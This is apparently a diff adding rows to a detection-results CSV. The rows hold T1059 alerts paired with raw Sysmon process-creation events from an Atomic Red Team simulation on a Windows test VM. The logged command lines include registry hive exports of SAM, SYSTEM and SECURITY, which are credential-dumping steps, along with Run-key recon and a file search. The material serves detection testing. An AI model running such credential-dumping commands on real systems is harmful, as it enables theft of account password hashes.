+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe  /S /D /c&quot; dir c: /b /s .docx &quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:52.048002Z"">
+    </TimeCreated>
+    <EventRecordID>3725</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:52.011</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-001012383200</Data>
+    <Data Name=""ProcessId"">608</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe  /S /D /c&quot; dir c: /b /s .docx &quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D88F-5D31-0000-0010BD353200</Data>
+    <Data Name=""ParentProcessId"">2780</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:51.996250Z"">
+    </TimeCreated>
+    <EventRecordID>3724</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:51.971</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D88F-5D31-0000-0010BD353200</Data>
+    <Data Name=""ProcessId"">2780</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:43.569071Z"">
+    </TimeCreated>
+    <EventRecordID>3723</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:43.520</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D887-5D31-0000-0010D51F3200</Data>
+    <Data Name=""ProcessId"">752</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SAM sam.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:41.660271Z"">
+    </TimeCreated>
+    <EventRecordID>3721</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:41.646</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D885-5D31-0000-00107F1A3200</Data>
+    <Data Name=""ProcessId"">2832</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SAM sam.hive&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\System system.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:39.229170Z"">
+    </TimeCreated>
+    <EventRecordID>3719</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:39.214</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D883-5D31-0000-0010839B3100</Data>
+    <Data Name=""ProcessId"">3904</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\System system.hive&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\Security security.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:33.619257Z"">
+    </TimeCreated>
+    <EventRecordID>3717</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:33.603</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010958F3100</Data>
+    <Data Name=""ProcessId"">1728</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\Security security.hive&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:33.559318Z"">
+    </TimeCreated>
+    <EventRecordID>3715</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:33.541</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010FA8A3100</Data>
+    <Data Name=""ProcessId"">3868</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:33.375717Z"">
+    </TimeCreated>
+    <EventRecordID>3713</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:33.365</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010CA843100</Data>
+    <Data Name=""ProcessId"">3900</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:33.303358Z"">
+    </TimeCreated>
+    <EventRecordID>3711</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:33.284</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-00103B803100</Data>
+    <Data Name=""ProcessId"">324</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:33.225776Z"">
+    </TimeCreated>
+    <EventRecordID>3709</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:33.209</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010B37B3100</Data>
+    <Data Name=""ProcessId"">3616</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
